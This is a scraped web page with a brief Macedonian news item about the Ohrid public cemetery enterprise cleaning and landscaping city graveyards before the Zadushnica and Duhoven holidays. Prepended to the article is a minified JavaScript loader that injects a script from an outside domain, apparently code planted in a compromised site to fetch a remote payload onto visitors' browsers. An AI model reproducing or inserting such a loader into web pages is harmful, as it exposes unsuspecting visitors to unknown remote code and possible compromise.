;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Градски Гробишта работи на хортикултурно уредување во пресрет на празниците -

Градски Гробишта работи на хортикултурно уредување во пресрет на празниците

Работната оператива на ЈП „Градски Гробишта” Охрид покрај редовното секојдневно чистење на градските гробишта, деновиве со зголемен интензитет работи на хортикултурно уредување и чистење во пресрет на празниците Задушница и Духовен.

DSC04495

DSC04475 DSC04490

 

Leave a Reply

Your email address will not be published.